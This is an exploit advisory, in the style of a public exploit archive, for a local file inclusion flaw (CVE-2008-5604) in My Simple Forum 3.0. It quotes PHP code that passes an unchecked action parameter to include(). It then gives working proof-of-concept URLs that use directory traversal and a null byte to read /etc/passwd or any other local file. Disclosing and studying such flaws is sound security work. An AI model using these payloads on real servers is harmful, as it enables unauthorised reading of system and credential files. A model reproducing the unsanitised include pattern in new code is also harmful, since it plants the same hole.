My Simple Forum 3.0 - Local File Inclusion

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-12-03  
date_updated: 2017-01-04  
verified: 1  
codes: OSVDB-50433;CVE-2008-5604  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7342.txt  

/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {

	local file inclusion on line 50


Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00

# milw0rm.com [2008-12-04]